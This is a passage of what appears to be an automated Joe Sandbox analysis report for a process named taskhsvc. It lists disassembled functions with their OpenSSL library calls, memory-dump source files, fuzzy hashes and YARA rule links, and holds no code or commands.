                                                            • Opcode Fuzzy Hash: fed53c1b3ffbdb350bb7ba7ef29e6e7f5f205d400e50c356631216372efaba33
                                                            • Instruction Fuzzy Hash: C821C2B15193029FE700DF24C54960BBBF0AB99798F21C90DE5A88B790C779D545CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6E6D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF6E70B
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6E787
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6E7B3
                                                              • Part of subcall function 6CF6E610: ASN1_INTEGER_get.LIBEAY32 ref: 6CF6E425
                                                              • Part of subcall function 6CF6E610: OBJ_obj2nid.LIBEAY32 ref: 6CF6E43A
                                                              • Part of subcall function 6CF6E610: OBJ_nid2sn.LIBEAY32 ref: 6CF6E442
                                                              • Part of subcall function 6CF6E610: EVP_get_digestbyname.LIBEAY32 ref: 6CF6E44A
                                                              • Part of subcall function 6CF6E610: EVP_MD_size.LIBEAY32 ref: 6CF6E45C
                                                              • Part of subcall function 6CF6E610: PKCS12_key_gen_asc.LIBEAY32 ref: 6CF6E4A9
                                                              • Part of subcall function 6CF6E610: HMAC_CTX_init.LIBEAY32 ref: 6CF6E4B9
                                                              • Part of subcall function 6CF6E610: HMAC_Init_ex.LIBEAY32 ref: 6CF6E4DC
                                                              • Part of subcall function 6CF6E610: HMAC_Update.LIBEAY32 ref: 6CF6E4FB
                                                              • Part of subcall function 6CF6E610: HMAC_CTX_cleanup.LIBEAY32 ref: 6CF6E50B
                                                            • CRYPTO_memcmp.LIBEAY32 ref: 6CF6E7CE
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6E817
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$J_obj2nid$D_sizeInit_exJ_nid2snO_memcmpP_get_digestbynameR_getS12_key_gen_ascUpdateX_cleanupX_initlh_retrieve
                                                            • String ID: l$w$~
                                                            • API String ID: 2221244672-2723911280
                                                            • Opcode ID: 38a381d092a97d88574171c4dd05297cf1e3b7c7502d8e2c94147caa67f048a6
                                                            • Instruction ID: f4b0f6b33a0f55b1767afe25cbaa744ed710fa5bd8a3f0b0cd2efc56205f7d94
                                                            • Opcode Fuzzy Hash: 38a381d092a97d88574171c4dd05297cf1e3b7c7502d8e2c94147caa67f048a6
                                                            • Instruction Fuzzy Hash: F91137766083008FD710CF29CA80A4ABBF4AB89358F158D1DE9A88BB11D730E944CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CED64F0 Relevance: 10.6, APIs: 7, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,6CEBC31D), ref: 6CED653A
                                                            • ENGINE_get_default_RAND.LIBEAY32 ref: 6CED6570
                                                            • ENGINE_get_RAND.LIBEAY32 ref: 6CED657E
                                                            • ENGINE_finish.LIBEAY32(?,?,?,?,?,?,?,?,?,6CEBC31D), ref: 6CED650F
                                                              • Part of subcall function 6CEBD660: CRYPTO_lock.LIBEAY32(?,?,?,?,?,?,?,?,?,00000000,?,6CE9E7FF), ref: 6CEBD69B
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_finishE_get_E_get_default_O_lock__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3080994723-0
                                                            • Opcode ID: 03a6a750de51ad848faea8dcb10480264385f734a7ca315a4d5a2905adf3a655
                                                            • Instruction ID: 4b064eef005fb6417f64223312a96743f9e24a9c149fef344128215d01f2abc1
                                                            • Opcode Fuzzy Hash: 03a6a750de51ad848faea8dcb10480264385f734a7ca315a4d5a2905adf3a655
                                                            • Instruction Fuzzy Hash: 47115BB0A252018BDF40DF36D58060A37F8EB4630CF621E2DD560CB748E731E4468B85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE6E6B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$q
                                                            • API String ID: 0-1492360937
                                                            • Opcode ID: b56636168c4143b9b90e8693448bc2cd2e123de76011ba9773e1053ca8a9d2b5
                                                            • Instruction ID: 9f0280c48aa737e31880ff615592316c53cc23ed90b067d4ecc401e5e1420bc9
                                                            • Opcode Fuzzy Hash: b56636168c4143b9b90e8693448bc2cd2e123de76011ba9773e1053ca8a9d2b5
                                                            • Instruction Fuzzy Hash: AA11F3B04197009FD7109F26C94874BBBF4AF85758F26881CE5945BB90D3B9E8488F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE3EF50 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_init$X_copy__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2907314389-0
                                                            • Opcode ID: a5de1b056d73e8dcb3f238e6d8f56c338765edfa2c28898cd2fdd29681000c59
                                                            • Instruction ID: b70d3caea9f8ae4c2d4f491365f400b39f8077f2c692ca00a41a6e3781050178
                                                            • Opcode Fuzzy Hash: a5de1b056d73e8dcb3f238e6d8f56c338765edfa2c28898cd2fdd29681000c59
                                                            • Instruction Fuzzy Hash: F411B6745157048FCB00EF35C68498BBBF8AF49308F52596AEA94CB704E734E549CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF36460 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: s
                                                            • API String ID: 0-453955339
                                                            • Opcode ID: c1e3404dd9a4195a2136637efd757ef29922319742a9c20a05cf894b61b97089
                                                            • Instruction ID: 25ba2031af8922fca86180ab0130a35c5bedea4fdcdc639c916a8953fa246a51
                                                            • Opcode Fuzzy Hash: c1e3404dd9a4195a2136637efd757ef29922319742a9c20a05cf894b61b97089
                                                            • Instruction Fuzzy Hash: EC115EB16087119FDB00DF29C64021BB7F1BB89358F129A2CE9A99B740C775E905CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF4CE90 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$TRUE$f$i
                                                            • API String ID: 0-1108683577
                                                            • Opcode ID: 038218182e34adf1e7f06adcfd03a88722d08fedbdb90b65949b81df3816f7c0
                                                            • Instruction ID: 923f76785a0afa25cc50fc335c13df995c7a25ebcae2fde9bc84cd223e57394f
                                                            • Opcode Fuzzy Hash: 038218182e34adf1e7f06adcfd03a88722d08fedbdb90b65949b81df3816f7c0
                                                            • Instruction Fuzzy Hash: 8401A2B15087018BE700AF75C54465FBFF0AB80308F119C2CE9944B741D779C448CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6AD30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF6AD49
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • PKCS12_SAFEBAGS_it.LIBEAY32 ref: 6CF6AD53
                                                            • ASN1_item_unpack.LIBEAY32 ref: 6CF6AD62
                                                              • Part of subcall function 6CF26C60: ASN1_item_d2i.LIBEAY32 ref: 6CF26C97
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6ADA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_obj2nidN1_item_d2iN1_item_unpackR_put_errorS12_S_itlh_retrieve
                                                            • String ID: y
                                                            • API String ID: 1570842488-4225443349
                                                            • Opcode ID: 394e48df7ea800dbdbc5739300cfc84de5c0ab95a6b4a8adda2b9a77550d6865
                                                            • Instruction ID: 18ec257549a7d66f0991e5cf616a24b7622374aebda43880af22b87eb5fb009a
                                                            • Opcode Fuzzy Hash: 394e48df7ea800dbdbc5739300cfc84de5c0ab95a6b4a8adda2b9a77550d6865
                                                            • Instruction Fuzzy Hash: CB01A4B19187019FDB00EF75D58464ABBF0BB85348F428D0CE9989BB00D775A54A8B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC8DE0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON
                                                            Download Yara Rule
